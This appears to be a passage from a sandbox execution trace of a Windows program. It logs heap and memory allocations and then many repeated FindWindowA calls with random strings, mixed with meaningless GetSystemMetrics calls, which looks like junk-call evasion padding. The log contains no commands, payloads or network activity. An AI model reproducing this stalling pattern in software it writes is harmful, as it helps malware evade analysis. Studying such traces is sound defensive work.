RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe) returned 0x5aa608 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x69) returned 0x5a89f0 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x3e) returned 0x5b22e0 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a8a68 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1d) returned 0x5a8a90 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x48) returned 0x5a8ab8 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5a8b08 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5a8b28 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1b) returned 0x5a8b48 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x24) returned 0x5b2838 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5aa0b8 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1e) returned 0x5b2868 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6b) returned 0x5b2890 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x17) returned 0x5b2908 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xf) returned 0x5aa6b0 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5b31a0 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5aa048 [0305.354] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x29) returned 0x5aa1d0 [0305.355] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5b3160 [0305.355] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x21) returned 0x5b2928 [0305.355] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x16) returned 0x5b3340 [0305.355] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x22) returned 0x5b2958 [0305.355] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x12) returned 0x5b3200 [0305.355] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2b08 | out: hHeap=0x5a0000) returned 1 [0305.356] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x800) returned 0x5b3480 [0305.356] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0305.357] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1250de0) returned 0x0 [0305.359] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5a7610 [0305.359] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="CompareStringEx") returned 0x774d6140 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="EnumSystemLocalesEx") returned 0x774e79d0 [0305.359] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="GetDateFormatEx") returned 0x775334d0 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="GetLocaleInfoEx") returned 0x774c6610 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="GetTimeFormatEx") returned 0x775337a0 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="GetUserDefaultLocaleName") returned 0x774bcd10 [0305.359] GetProcAddress (hModule=0x77420000, lpProcName="IsValidLocaleName") returned 0x774e4bf0 [0305.359] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x77420000 [0305.360] GetProcAddress (hModule=0x77420000, lpProcName="LCIDToLocaleName") returned 0x774d6fc0 [0305.360] GetProcAddress (hModule=0x77420000, lpProcName="LocaleNameToLCID") returned 0x774d7de0 [0305.360] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20) returned 0x5b2dd0 [0305.360] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5a7be8 [0305.360] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a7be8 | out: hHeap=0x5a0000) returned 1 [0305.360] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5a7be8 [0305.362] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5a3628 [0305.364] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b3140 [0305.365] GetLastError () returned 0x0 [0305.365] SetLastError (dwErrCode=0x0) [0305.365] GetLastError () returned 0x0 [0305.365] SetLastError (dwErrCode=0x0) [0305.365] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2df8 [0305.365] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b3c88 [0305.366] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3c88 | out: hHeap=0x5a0000) returned 1 [0305.366] GetLastError () returned 0x0 [0305.366] SetLastError (dwErrCode=0x0) [0305.368] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5a2958 [0305.368] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5a8b70 [0305.368] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5aa530 [0305.368] GetLastError () returned 0x0 [0305.368] SetLastError (dwErrCode=0x0) [0305.368] GetLastError () returned 0x0 [0305.368] SetLastError (dwErrCode=0x0) [0305.368] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2eb8 [0305.368] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b3c88 [0305.369] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3c88 | out: hHeap=0x5a0000) returned 1 [0305.369] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a2958 | out: hHeap=0x5a0000) returned 1 [0305.369] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2df8 | out: hHeap=0x5a0000) returned 1 [0305.369] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5aa530 | out: hHeap=0x5a0000) returned 1 [0305.369] GetLastError () returned 0x0 [0305.369] SetLastError (dwErrCode=0x0) [0305.369] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5a2958 [0305.369] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5aa530 [0305.370] GetLastError () returned 0x0 [0305.370] SetLastError (dwErrCode=0x0) [0305.370] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x200) returned 0x5b3c88 [0305.370] GetLastError () returned 0x0 [0305.370] SetLastError (dwErrCode=0x0) [0305.370] GetLastError () returned 0x0 [0305.370] SetLastError (dwErrCode=0x0) [0305.370] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5a9fd0 [0305.370] GetLastError () returned 0x0 [0305.370] SetLastError (dwErrCode=0x0) [0305.370] GetLastError () returned 0x0 [0305.370] SetLastError (dwErrCode=0x0) [0305.370] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2df8 [0305.370] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b3e90 [0305.370] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3e90 | out: hHeap=0x5a0000) returned 1 [0305.371] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a2958 | out: hHeap=0x5a0000) returned 1 [0305.371] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2eb8 | out: hHeap=0x5a0000) returned 1 [0305.371] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a9fd0 | out: hHeap=0x5a0000) returned 1 [0305.371] GetLastError () returned 0x0 [0305.371] SetLastError (dwErrCode=0x0) [0305.371] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5a2958 [0305.371] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5aa530 | out: hHeap=0x5a0000) returned 1 [0305.371] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a8b70 | out: hHeap=0x5a0000) returned 1 [0305.371] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5a8b70 [0305.378] FreeConsole () returned 1 [0305.580] VirtualAlloc (lpAddress=0x0, dwSize=0xed, flAllocationType=0x1000, flProtect=0x4) returned 0x510000 [0305.581] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x1000, flProtect=0x4) returned 0x520000 [0305.581] VirtualAlloc (lpAddress=0x0, dwSize=0xaa, flAllocationType=0x1000, flProtect=0x4) returned 0x530000 [0305.582] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x4) returned 0x540000 [0305.583] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x1000, flProtect=0x4) returned 0x550000 [0305.584] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x4) returned 0x560000 [0305.595] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x4) returned 0x570000 [0305.596] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x4) returned 0x580000 [0305.597] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x4) returned 0x590000 [0305.599] VirtualAlloc (lpAddress=0x0, dwSize=0x59, flAllocationType=0x1000, flProtect=0x4) returned 0xac0000 [0305.599] VirtualAlloc (lpAddress=0x0, dwSize=0xe5, flAllocationType=0x1000, flProtect=0x4) returned 0xad0000 [0305.600] GetSystemMetrics (nIndex=84926444) returned 0 [0306.444] FindWindowA (lpClassName="REbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoa", lpWindowName="c8Wsa1xVPfvJcrgRYwTiizs2trQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2d") returned 0x0 [0306.444] FindWindowA (lpClassName="8S4kwIgTxSl1C00GOzOLMrbAyfKUUTsGCoRblsaqv6UpdvNIsNrmwUlN5u9t3tgj2tusZBauF", lpWindowName="MeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH") returned 0x0 [0306.444] GetLastError () returned 0x57 [0306.445] GetSystemMetrics (nIndex=93979663) returned 0 [0306.445] GetSysColorBrush (nIndex=23446885) returned 0x0 [0306.445] GetSystemMetrics (nIndex=74575352) returned 0 [0306.445] FindWindowA (lpClassName="5Ayy61leDYT3CEW8K69rklPGtfUR2IZ2mB1S7NLt2nQfj3SL3XByImciQTqVaAUnJvUmHVQGs", lpWindowName="CmZFOv1QDIIXJNZI95hFQr77BIElyct4Aj6PKnZpzRiKYpZgnSOKlq8AzrHqDoGL4RHyqyX3g") returned 0x0 [0306.445] FindWindowA (lpClassName="hmWvn7MIr9oDUTOX7NYEkZgzUny1swObdYSEvWRBLzZ02h67YrlvBndn4cXPaoaKk5lQn33hf", lpWindowName="TmvHeuSEBMSPh2Q6dQAjy4KjsfSXF4YP8arF3SLLny30KKziHtRbOE2u8qvJP3B6Uiu1gJ03O") returned 0x0 [0306.445] GetLastError () returned 0x57 [0306.445] GetSystemMetrics (nIndex=74682446) returned 0 [0306.445] GetSysColorBrush (nIndex=46326723) returned 0x0 [0306.445] GetSystemMetrics (nIndex=69647734) returned 0 [0306.445] FindWindowA (lpClassName="UTjlTOSj3iH7JTRsbYH133TyWLIB4G3sV0ykPds7HX27KbNCCytJR8Cu6XFptEIP68v8ZdV60", lpWindowName="881nP7VxEE4FdgcL9fOPyc98bI89qTPFtysL1Q4GTOPwD7kkqPqQ5PNEEfuTlCH9WpIYaPHWf") returned 0x0 [0306.446] FindWindowA (lpClassName="r7J1hAkTkUFvMA0OSa91e9gqVNBeg10gAI4OMrxF2ltRPWacKwhzQyw8byxIFwOQfxFYy0quu", lpWindowName="GXAPZHAD2vQkWrpqiwdo3Hrdt6z3lSTpgTpRpRVcwo6HM8uA8D9eE4ZADtmvWvN20LBHSkD6q") returned 0x0 [0306.446] GetCurrentThreadId () returned 0xbe0 [0306.446] GetSystemMetrics (nIndex=56677337) returned 0 [0306.446] GetSysColorBrush (nIndex=92824829) returned 0x0 [0306.446] GetSystemMetrics (nIndex=42449585) returned 0 [0306.446] FindWindowA (lpClassName="jBQjgnZSCe8nPQHnppZqt456uNhaAAZ7eJqXZMwECM9T0ci76RojHkpC99IR3WsIMd3jKuWwP", lpWindowName="71MRVOgDko8fnPYlapdvxlUsBH29Cm3ORYkfrjRZDdw6LcpX33e1IOwWR2uaAtZVB5yi9ijSA") returned 0x0 [0306.446] FindWindowA (lpClassName="hTmfAUKYckdKB9Ppfr6SkbeR8PKPlKtGBlyLUlctAOGXldP7MVJKo22zHcL8AII08n8YXDzJF", lpWindowName="swERoC0nE0pAli9Mk6pyZdABIGpASsMZ6uUeHJj8Ut6sSUOT0ouihnKJGjkvaPWolzchUSmJq") returned 0x0 [0306.446] GetConsoleWindow () returned 0x0 [0306.446] GetSystemMetrics (nIndex=36326925) returned 0 [0306.447] GetSysColorBrush (nIndex=56848996) returned 0x0 [0306.447] GetSystemMetrics (nIndex=98387748) returned 0 [0306.447] FindWindowA (lpClassName="qabztw5K1eD28Kin4mMxkcNZnWrc6hIXQdczX4fr0RMtivVlvkI3S1WSxzzthFYqGEdkVpeKg", lpWindowName="G35SqTGtifPRHmoGrgKq6MbYsSXvy60MjweSbK31tz14EbA1KG3aMSFgDmnfMwafStMicLMPC") returned 0x0 [0306.447] FindWindowA (lpClassName="rAnGePtx5v3gYKbBkp7iE8TLmAZusXVJpKqtgPAOg1vriJN04X29XdBh8j0SCA0zKFZdSKQc5", lpWindowName="HaJ5P1fJXE0YMq1we9QL2rKEs8yKDAVn3QLJwWy0vNKb4LTfLMMLq080gXW8zW5v6qCQNwWaE") returned 0x0 [0306.447] GetLastError () returned 0x57 [0306.447] GetSystemMetrics (nIndex=96699449) returned 0 [0306.447] GetSysColorBrush (nIndex=62999265) returned 0x0 [0306.447] GetSystemMetrics (nIndex=28358548) returned 0 [0306.447] FindWindowA (lpClassName="GJhxWkhVYO3dJfBuCov1eETvOmdRXXNsyE4NHRkTZCBldIkbSUz2k4XdH9VxSffSaITvgEsji", lpWindowName="ykKPltKud5EUWDutAgMVsvmUM03YmjIqtYFpEFljgwsA1AnevjPJC0d543tUYLjC0XVLuq9Ca") returned 0x0 [0306.447] FindWindowA (lpClassName="tm9WgMaF0mJKATWd43OflAQsoC7WO95efK2h3B98kTDHqyzKXoJMFchjR1wTYI67ekrUydLRJ", lpWindowName="eOpxcfBn4tzYABythRDUSLUcbCkFeXVwVQZaOA2jb1NDCX3vP20n39X6hhgnz4Mf1it18OLKd") returned 0x0 [0306.448] GetCurrentProcessId () returned 0xf94 [0306.448] GetSystemMetrics (nIndex=38645843) returned 0 [0306.448] GetSysColorBrush (nIndex=52253875) returned 0x0 [0306.448] GetSystemMetrics (nIndex=65246699) returned 0 [0306.448] FindWindowA (lpClassName="NaQPFKnSJuhqhH2WlcvyL4MAeQXggMnn79XAVJRrz1uBdbraRvC4iU1b6GvS1TiZMqvUrwcY7", lpWindowName="XFyxfRWIz9RwJakyvPmMoLBCRyp0qZbXHjtanzWWpCmfLf8hgMcVOxm7E0c9GUa8m6xqqEZ1E") returned 0x0 [0306.448] FindWindowA (lpClassName="KWTSqZTqOpaZDAqyRvJykTwFn3VsamFkqU1BcDuG07mjjq873tLM70Rm3tBHYf2FpMSsvHgod", lpWindowName="RJCXTNIfkulpeHgd1xYctR9RF3YxVeBJKYQu7A0XTaehlb8tRbhXVz9Az1I6BDvjwRgw6eX3a") returned 0x0 [0306.449] GetCurrentThreadId () returned 0xbe0 [0306.449] GetSystemMetrics (nIndex=97673357) returned 0 [0306.449] GetSysColorBrush (nIndex=56784255) returned 0x0 [0306.449] GetSystemMetrics (nIndex=67589924) returned 0 [0306.449] FindWindowA (lpClassName="2hXyhlbqHeXKIYpOhzGZdGTzkPJe5AhAzvRdS9AaopPbPCxcxwTJIK38Dwmj69IK6KVxSN2yF", lpWindowName="kY8vbduFDFDHnZw3L1gm3H3VlGaUSvXonVZYjXaRgVNcJNzs08I7m4baYXjmxEHysOozZhzLj") returned 0x0 [0306.449] FindWindowA (lpClassName="soZncwBZWwjV3ZoDNJq8VJQUEOLJ8jECD92Bxch5N00ZEPdi8nfR9Od6xmldTHodT9cZ93mGp", lpWindowName="0SCl9nTdejMgZRlccTGX8vuKrACuTi9DM5uXp9fEKZABTNEQDgsYmP69ydQsKCjSE1FtVosqE") returned 0x0 [0306.449] GetCurrentProcessId () returned 0xf94 [0306.449] GetSystemMetrics (nIndex=67363256) returned 0 [0306.449] GetSysColorBrush (nIndex=65977833) returned 0x0 [0306.449] GetSystemMetrics (nIndex=68765442) returned 0 [0306.449] FindWindowA (lpClassName="NZSlQiFqDMeb4hgxaWXxsxi3ACh0XXdea2vQfNw0KkibxehT3v5G2OhZgKZmCVSQ9iCvUX1zC", lpWindowName="bgtUaYhSJcgVSEe4d3mbHE3wyiGOft3KmuvFnijwndit6Bb5rW1ssFwxwZrptnzsTGlZHvojW") returned 0x0 [0306.450] FindWindowA (lpClassName="S3mPW6Yl2M9LhIU3FqTyDvZdPUBXCBZ37CFjIy9znmJIgWyT7YIgH05yfrCMvfoH1VDKMYcf1", lpWindowName="N8tTeVZOXj6Sj9AMQKHQNTkRuv0HclWhC9NY7bxX4xfkPrCtcI90Gp8YjRnkbQUJSCLwxsz3z") returned 0x0 [0306.450] GetConsoleWindow () returned 0x0 [0306.450] GetSystemMetrics (nIndex=53943425) returned 0 [0306.450] GetSysColorBrush (nIndex=89629448) returned 0x0 [0306.450] GetSystemMetrics (nIndex=75259863) returned 0 [0306.450] FindWindowA (lpClassName="cdbhY3sPWbgPei2Rv4zNEaZDFtvsXZw234XoJil2JPwKFB81iFPt8VwYU9KSTc7TxJS5fgjZI", lpWindowName="EQxiTmCX4VVSgoKEVwwgXEGiQUNloYdC41w2UFYwoXBcjNemZauOR03U9ph3iHa1QFt7EeMp9") returned 0x0 [0306.450] FindWindowA (lpClassName="joTD3Roe9tUhzNCjFkhMJ9N1XXwN9r6Mjb526TR5xScJ1D4VjfrfwmOZGylOWSPdkICuBVbdX", lpWindowName="wWsOrkBPg1kIAEXDdao2rPY9Tmtf4IA5WaZ8awIzaTgyKnutVL7pdQQGnJwoIY54dGi6BxMDm") returned 0x0 [0306.450] GetCurrentThreadId () returned 0xbe0 [0306.450] GetSystemMetrics (nIndex=24422966) returned 0 [0306.450] GetSysColorBrush (nIndex=27946274) returned 0x0 [0306.450] GetSystemMetrics (nIndex=73847844) returned 0 [0306.450] FindWindowA (lpClassName="0synipUKG3NoPJ53xAdfUxcPu6Q5IJB1U2zn9kaY4mOsN03T3z4D5HTaYd7tFsR0FvWCDz06y", lpWindowName="oyfsRaUwIQjMDtCJjXwy5PcXLicsSIwDbDSNVufCXt5NWzVipntaBawfSWL3TtuQP2t0APmhI") returned 0x0 [0306.450] FindWindowA (lpClassName="hzxfz0STGR3su0HxcrqCQMsVUX4jF7ZYNRVdoV5Y4fYPkSeGjxoXjAGxtI8m19vmCZI9YZU23", lpWindowName="o4opxOK84fta7oiKuQlPhKATD4GMsKNVH7Wfi1zg5YOvtVkrnzspgnKy5tETPiUphdxe2Scrb") returned 0x0 [0306.450] GetCurrentProcessId () returned 0xf94 [0306.450] GetSystemMetrics (nIndex=28943575) returned 0 [0306.451] GetSysColorBrush (nIndex=95948663) returned 0x0 [0306.451] GetSystemMetrics (nIndex=75268993) returned 0 [0306.451] FindWindowA (lpClassName="EWq1n8pIK3y8PebTkARVZR0DshPvYlRIDNgIaW8hqeueIFFc8Ah5QrfAPnUt1fm1jomYqLMlf", lpWindowName="1JyHaoYLHGNfzs4hiV6eYBQFaJ81eyTn3iSAM5r4R3MBFj8vRrqVxLAOy99exXT5bbbvHYEMy") returned 0x0 [0306.451] FindWindowA (lpClassName="N8p5O7p6UMlRxwQ0gpLRWaNEKvGkmY5kinZQ6XeFHZl1F6yKWN9wGTC2s6aatIYHgVdPedIoA", lpWindowName="qg101S7HPjM8oTPRr0e6FAzwzAENDGJVm9kFydOVVq0pUZ63bMA4rciLwRDfospupEkLJQ65r") returned 0x0 [0306.451] GetLastError () returned 0x57 [0306.451] GetSystemMetrics (nIndex=44455424) returned 0 [0306.451] GetSysColorBrush (nIndex=88486385) returned 0x0 [0306.451] GetSystemMetrics (nIndex=27677439) returned 0 [0306.451] FindWindowA (lpClassName="8ksHpDhFkSP3msI6XZMEwGusP3SjwgyDrgY9TcX1dY3RIctvUY16XSOiiZqTo9VxlSDaEFPgT", lpWindowName="hS46TFudBBKa5jiZPnCEDzHOTJcJwef0hg0ANLZMur7bed0KPb9PBkwzFeaKQbIbSBRl1scEx") returned 0x0 [0306.451] FindWindowA (lpClassName="0AiMpIzXoaswtGzU6wy9iUxz2Y2fKO8c7WYFWJhnUqUn6TDQvVpDlfyXC9nuPUABJkOmfySds", lpWindowName="s79ax7uR5QwN3gcifOpKg0RM3RXuN3aKtr60OvEXdaEYS8fsa4aLEli2Yl4L4vSa6xKTm1QJJ") returned 0x0 [0306.451] GetCurrentThreadId () returned 0xbe0 [0306.451] GetSystemMetrics (nIndex=26736796) returned 0 [0306.451] GetSysColorBrush (nIndex=78529763) returned 0x0 [0306.451] GetSystemMetrics (nIndex=77885346) returned 0 [0306.451] FindWindowA (lpClassName="9RxG5WLsE9f6ebsOTWbp8XIDgvWpgXGELxdEQOmiogcVQq7sZe2nsaw4Ee2fgWq21JU2Idl6E", lpWindowName="3S2GU59vVJVXO6aMx3QRb0xN2pI1y7pEgBpN6u9bEKwO76uAIrnHfcFYWeSgMJM08iYfRYDLB") returned 0x0 [0306.452] FindWindowA (lpClassName="CvxQXSd1tY9cmDzPdSIiwEtLHXVZsObjhSXpcfJ2aHgWeujLwzo8X96pNpLPnVhxSPRW0M25Q", lpWindowName="5F6wvy5JvKJa2djXrvvFDy6HLhk91Rggxp9WW1wYsVx5W0yG83ALuOHiI6yefMSqsKTlXhBhU") returned 0x0 [0306.452] GetCurrentThreadId () returned 0xbe0 [0306.452] GetSystemMetrics (nIndex=44663686) returned 0 [0306.452] GetSysColorBrush (nIndex=53448633) returned 0x0 [0306.452] GetSystemMetrics (nIndex=64393784) returned 0 [0306.452] FindWindowA (lpClassName="0QpZG9Uv54oGDDU5Qe8dZhX63rnPGGKZPb8jpgBfQtNRRxJ7Gc2dwPMY20H08Xwi0at2jVEr6", lpWindowName="diFwB4sAfmWR9Y4CP51DYzsDa6KVaDXAq6SHALXYpYf1bCi3eM6KWvIAASKJEO4Lb4bWozXys") returned 0x0 [0306.452] FindWindowA (lpClassName="4bVrNFVCYsA4K3Z6qeY0dLL7FNP3EehjTFOB7BoSptqXhGNFohRDz6vZVDReB6mxB0ZRaxbIR", lpWindowName="ihUPEYYFiiHS6HDN1kvhys8yv2BTixWgo5eeCVjy4wOCWaqQ12lrf58Tp9dlF4BG5xMLLGybR") returned 0x0 [0306.453] GetCurrentProcessId () returned 0xf94 [0306.453] GetSystemMetrics (nIndex=54772937) returned 0 [0306.453] GetSysColorBrush (nIndex=47723287) returned 0x0 [0306.454] GetSystemMetrics (nIndex=76429672) returned 0 [0306.454] FindWindowA (lpClassName="a7ZYwr4aTG2C7Qia3eeMydkfj2i13Pl32CTfFJ8zmglOu2GohPm2YQox9Kos6Ydc0ahMkQYpM", lpWindowName="qrMZEYnTQmK7lIhDLqGDyxsvVr0wSSm5SgMHz26YjkS8taguJgNakyOO9TJXQXpS68k8Rbkxg") returned 0x0 [0306.645] FindWindowA (lpClassName="4IzwW8GrZPpwYWcp6k8cactZ8rqYI0jHSGvY134iPlCeClSxjb7OdAsExNBNcNDG5OqjGagEu", lpWindowName="biZj9SKb47QxlfFjnWpMXD22rqy3wHKdP8es092dAcDHXjkOCjQJ0cyIXmWiNHDahXnZfIpnL") returned 0x0 [0306.646] GetConsoleWindow () returned 0x0 [0306.646] GetSystemMetrics (nIndex=29954344) returned 0 [0306.646] GetSysColorBrush (nIndex=78423627) returned 0x0 [0306.646] GetSystemMetrics (nIndex=57852546) returned 0 [0306.646] FindWindowA (lpClassName="8bIc6hBsZXDwghPpNQni4Lq5Tx60luda1xIhy5fBefyAMnFn1xH2rTdqgIkaE2HxsdX1KlWXt", lpWindowName="uFoiMD1uTyJ7xgEfAATAO8kk8zTp0KVDibIRxxEqm7GYOpb2ewRo8LXY4dLywY6pHUqINoKRX") returned 0x0 [0306.646] FindWindowA (lpClassName="qyiCvQEAVXHGUEnG96tWCTpbJXpgSkSjBb8QRKGcEr9EjJT8GSvwdkPZXdphPRP5Ylz86bsQe", lpWindowName="qtyKwsZSva2AIvKLuvHJniJMmpQNGl6WXVW0idt8Zaj95SzkXT8ZpDQjl947fr7MoUF0Flcbt") returned 0x0 [0306.646] GetCurrentThreadId () returned 0xbe0 [0306.646] GetSystemMetrics (nIndex=94537572) returned 0 [0306.646] GetSysColorBrush (nIndex=63796893) returned 0x0 [0306.646] GetSystemMetrics (nIndex=67967874) returned 0 [0306.646] FindWindowA (lpClassName="C32OM1JOkib5I5qY2lFhXWGXsC6Pt0GIsFTnTZSg06VDgG1FdC5dyGE2qW4HvjBRZVStdwwCU", lpWindowName="j711hzV7fdWFcRBREldWDBwkevQR4yfm8dE4WK2uFXHuibsiEsoM3wStIAQI66y2qtuF65y5q") returned 0x0 [0306.646] FindWindowA (lpClassName="O3NPVQNjnEo925b76we7p5ieeI8tYWmFGzuR3cRjrXkzmQa4DXFe9OH46yIUFl0XjDqDsE9G4", lpWindowName="zCgWm0oojRZf5LDFzwJsEkG1BZUdWp6sah2jzzjFWtxsrDzQOU2vYTHHoJCDeC83luem7raLU") returned 0x0 [0306.646] GetLastError () returned 0x57 [0306.646] GetSystemMetrics (nIndex=86948868) returned 0 [0306.646] GetSysColorBrush (nIndex=82729936) returned 0x0 [0306.646] GetSystemMetrics (nIndex=57892864) returned 0 [0306.646] FindWindowA (lpClassName="3WfdXCHDPQPeQ8Hzynx6mMA0N7j95k7Ai4Z93xaG0PEPp1ZNxGFFhR1QMD6Wuzlezf98VVWnE", lpWindowName="YKI4JSgVS0qZFUD7BQv0TPW4sVCdFsdgaixwB9dyCCsn00KTMZMvbcowhjvKL4au1o6yALKxH") returned 0x0 [0306.647] FindWindowA (lpClassName="R85PlbWG9mVUhDpTNHVcrOHYmmgZ0TwQHuylQvPuof9VjztUg5Wq0L8hVnUsngdq6ON7GZ3fb", lpWindowName="zSJsfumcgLBzVfQv2MeiKlEOowgmHlpblyDwOvqaIegkroPTZZPyeZjCzIKAtaBnf44veM0gC") returned 0x0 [0306.647] GetCurrentThreadId () returned 0xbe0 [0306.647] GetSystemMetrics (nIndex=54577592) returned 0 [0306.647] GetSysColorBrush (nIndex=77456674) returned 0x0 [0306.647] GetSystemMetrics (nIndex=25964284) returned 0 [0306.647] FindWindowA (lpClassName="p5rVitT7qS6HVFpazsCxRBW8B9EZF9cieLr3N4dvVM24tZMkytGETz3g9YtwPrNZH0cPG0rNl", lpWindowName="m83uv8WaDDx47SfOAI8xkpL5gdRpIXJ6ztcvK8XzZbBbDr9YDQSYwvlefn03A5SQmAsorh9hw") returned 0x0 [0306.647] FindWindowA (lpClassName="TY1SH4aSk6eXu8RAumtZfM15K4r9Xc2PkfrYQWDPotZIWI7qF4VkHbXt18J7NQQkGwrJFxR6N", lpWindowName="jM2zbncOGIWhSQHa53zPevMKwfbxzgyMxVMMkTRm0MKHCqzT0P5A2R8GpaaiWPLwDTAgZw3Yz") returned 0x0 [0306.647] GetCurrentThreadId () returned 0xbe0 [0306.647] GetSystemMetrics (nIndex=35636394) returned 0 [0306.647] GetSysColorBrush (nIndex=43934598) returned 0x0 [0306.647] GetSystemMetrics (nIndex=75833578) returned 0 [0306.647] FindWindowA (lpClassName="BsORXtJTrPEvpoeCYHjZQnWIgNsQjiC0Y82GV5gMZ8pHG8vmB5uwGp1a83XIdD9d9dqvxWr1i", lpWindowName="SVgHCispIM9oCIpxKMcjIlYnFhGiU3Q1VBLAljpV00j6Gx2xDOyFyOIb5anh2CV0AgLTfbnLj") returned 0x0 [0306.647] FindWindowA (lpClassName="UvJTquguZlHg4yALGqKDZGxoOe4ZYyjogess9IUg7z2jqhEfxVJqn0Hiqfbroh4tkBMlNG8fs", 